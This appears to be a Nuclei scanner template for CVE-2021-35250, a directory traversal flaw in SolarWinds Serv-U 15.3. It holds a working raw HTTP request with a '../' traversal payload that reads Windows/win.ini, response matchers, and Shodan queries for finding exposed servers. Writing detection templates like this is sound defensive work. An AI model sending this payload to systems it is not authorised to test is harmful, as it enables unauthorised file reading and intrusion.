id: CVE-2021-35250 info: name: SolarWinds Serv-U 15.3 - Directory Traversal author: johnk3r,pdteam severity: high description: | SolarWinds Serv-U 15.3 is susceptible to local file inclusion, which may allow an attacker access to installation and server files and also make it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | Successful exploitation of this vulnerability could lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further attacks. remediation: Resolved in Serv-U 15.3 Hotfix 1. reference: - https://github.com/rissor41/SolarWinds-CVE-2021-35250 - https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-3-HotFix-1?language=en_US - https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35250 - https://twitter.com/shaybt12/status/1646966578695622662?s=43&t=5HOgSFut7Y75N7CBHEikSg - https://nvd.nist.gov/vuln/detail/CVE-2021-35250 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-35250 cwe-id: CWE-22 epss-score: 0.05835 epss-percentile: 0.93393 cpe: cpe:2.3:a:solarwinds:serv-u:15.3:-:*:*:*:*:*:* metadata: max-request: 1 vendor: solarwinds product: serv-u shodan-query: - product:"Rhinosoft Serv-U httpd" - product:"rhinosoft serv-u httpd" tags: cve2021,cve,solarwinds,traversal http: - raw: - | POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded /?Command=NOOP matchers-condition: and matchers: - type: regex part: body regex: - "\\[(font|extension|file)s\\]" - type: status status: - 401 # digest: 4a0a004730450220090501ead5ca270506d7ae118f516c32825196a8c9f555bb0f769c4d403cc12a022100b5b32adb45f35376c6085ba0dec2d68006c68f0ae293848f2541bf8838b99948:922c64590222798bb761d5b6d8e72950